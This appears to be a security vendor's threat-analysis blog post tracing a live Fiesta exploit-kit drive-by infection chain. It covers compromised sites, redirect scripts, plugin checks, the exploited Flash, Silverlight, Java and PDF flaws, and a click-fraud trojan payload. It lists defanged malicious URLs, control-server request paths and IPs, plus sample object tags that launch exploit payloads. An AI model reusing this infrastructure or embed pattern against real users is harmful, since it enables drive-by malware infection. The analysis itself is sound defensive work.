By: Sameer Patil

Fiesta Exploit Kit: Live Infection

Exploit Kit

 
During our daily hunt for Exploit Kits (EK), we came across many live Fiesta exploit chains.
The infection started from the following compromised domains:
  •       orpi.com
  •       soyentrepreneur.com
  •       interfacelift.com

Compromised sites:

The attackers often leverage compromised sites to serve as the first level of redirection in the EK infection cycle. In the first Fiesta EK instance that we analyzed, the attacker after getting the root access has modified the “scripts.js” file present at location:
  •       hxxp://www[.]media[.]orpi[.]com/js/scripts.js
 
All the pages importing this JavaScript file will redirect the user to "nvplus[.]com/wp-content/".
 
 
Another variation of the initial loading page redirection was observed in the compromised site “interfacelift[.]com” at the following location:
  •       hxxp://interfacelift[.]com/wallpaper/downloads/date/any/   
 
In this case the attacker added a <script> tag with the location pointing to another redirection site at:
  •          hxxp://sunduk[.]biz/forum/docs/

A third variation of the initial redirection was observed on the compromised site
"soyentrepreneur[.]com", where the attacker created a new JavaScript file “funcionesCarga.js” at the following locations:
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/funcionesCarga.js
  •          hxxp://www[.]soyentrepreneur[.]com/assets/js/se2013/funcionesCarga.js
The website pages importing these JavaScript files will redirect the user to the Fiesta loading site.

All three initial redirection methods are fairly stealth and can remain unnoticed for days to the web administrators. We found this approach to be more effective and completely opposite from a RIG EK compromise that we recently analyzed where the attacker changed the home page of the website to ensure redirection. 

Fiesta EK:

Some of the recent live Fiesta EK loading sites found in the wild are:
  •        nvplus[.]com/wp-content/
  •        son-ko[.]com/scripts/bundles/login.php
  •        sunduk[.]biz/forum/docs/login.php
  •        toringaz[.]com/images/
  •        barferoase[.]de/blog/wp-content/themes/
  •        www.artlen[.]com/assets/cache/rss/
  •        www.courieru[.]com/cache/joomsef/
  •        www.roofstroy[.]com/stroy/js.php
  •        ticketstolisbon[.]com/dumper/
  •        cic.com[.]ua/dok/
  •        talktyme[.]com/flash/
Apart from the usual EK redirection chain, it checks for the user's browser as well as presence of application plugins for Microsoft Silverlight and Adobe Flash.
 
It checks if Silverlight plugin is installed by creating the following ActiveXObject object:
  •  ActiveXObject("AgControl.AgControl") 
The presence of Flash plugin is ensured by creating the following object:
  • swfobject.embedSWF()
If both the above object creation functions generate an exception, then the exploit cycle terminates. But if the vulnerable versions are found, it takes the user to the EK landing page.
 
Redirection to Fiesta EK Landing page
 
 
 

Fiesta Landing Page:

Initially, the malicious Silverlight and Flash files are downloaded for which the plugin checks have already been performed.
 
AV detection for the downloaded malicious files:
 
  •       rtu.swf: 2/55 (Generic Exploit)
  •       rtp.xap: 2/54 (CVE-2013-0074)
 
Following this, the main controller of Fiesta EK is called. Example in one of the Fiesta EK instance we analyzed:
  •        hxxp://hjwqk.ianlar[.]in/pofrj4l/1
It generates the following GET requests to the same domain during the course of the Exploit cycle:
 
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/321eabf3f523be344045575e50595404020b045e5500560806060006515a5e04;120000;0
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/6ea46961ad8578015717000f07020406075c540f025b060a0351505706010e06
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/7a77e441c530b7c15419520c540f06060658020c5156040a02550654550c0c06;1;2@@
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/1b88a025c530b7c1521a5d03500b0002005b0d035552020e0456095b51080a02;1;3@@
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/675e60f2d4cb58ae5c59595e070b5405070e005e025256090303040606085e05
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/2a78dd2dfa898b9d5b045b03555f0053035802035006025f0755065b545c0a53
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/33603690d9fdeed05f5a540b020d0b07020a030b0754090b06070753030e0107;900
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/2a7f53d52bfa0822410d415d040856020358025d0151540e07550605050b5c02;5061118
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/61295aeb0e3b886755415902045a575507080702010355590305035a05595d55;5;1
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/3bb805820e3b886750120903010e0a05025b5703045708090656535b000d0005;6;1
·         hxxp://hjwqk.ianlar[.]in/pofrj4l/535c3355fb26fbd956435e5802080702040a00580751050e00070400030b5405;1;1
 
 
 
The Fiesta EK is performing the following exploitation attempts which are resulting in the multiple GET requests:

Adobe Flash
  • Checks if Adobe Flash is installed and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded SWF file "rtu.swf".
  •       A sample object of type “application/x-shockwave-flash” with dynamic run-time parameters to run the exploit payload is created as shown below:
“<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='FnkwX'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='wetsgk=MWYzH'/><param name='Play' value='0'/></object>"
 
Microsoft Silverlight 
  • Checks if Microsoft Silverlight is installed in browser and gets the application version.
  • It then generates a GET request to fetch the run-time parameters for the previously downloaded XAP file "rtp.xap".
  • A sample object of type "application/x-silverlight" with dynamic run-time parameters to run the exploit payload is created as shown below:
"<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='LVSDE'/><param name='initParams' value=<LONG_STRING_VALUE></object>"


Java
  • Check if Java plugin is installed and enabled in the browser.
  • Downloads a malicious Java archive (JAR) based on the installed version:
    • JAR File -> ianlar.jar: 4/55 (CVE-2012-1723)
  • It then generates a subsequent GET request to fetch parameter values required to execute the malicious JAR payload.
  • Creates a custom applet tag utilizing the run-time parameter values to run the exploit payload as seen below:
 

Adobe Reader
 
  •        Checks for the presence of the Adobe Reader plugin.
  •        Downloads and executes the malicious PDF file: 
    •        PDF File -> Ianlar.pdf: 8/55  

Post-Infection

Upon successful exploitation, Fiesta EK was observed installing a new variant of Zemot Trojan from the following location:
  •       hxxp://warzine[.]su/b/shoe/54602
This is a well known Click-Fraud Botnet family which will soon start click-fraud activity on the victim machine, making money for the malware authors.

This Click-Fraud malware family appears to be connected to many other EKs in addition to Fiesta. Some of the domains involved in the Click-Fraud activity:
 
  • num-lnkd.com
  • syserty-war.com
  • turend-hureft.com
  • service-search.com
  • fifa-seargh.com
  • enjoy-result.com
  • oak-search.com
  • phantom-search.com
  • companies-search.com
  • calimera-search.com
 
 
The above domains were resolving to the following two servers located in Russia and Ukraine respectively:
  • 46.161.41.220
  • 192.162.19.34
 A GET request to any of these domains look like this:
 
 

 
 
- Sameer Patil
 

Learn more about Zscaler.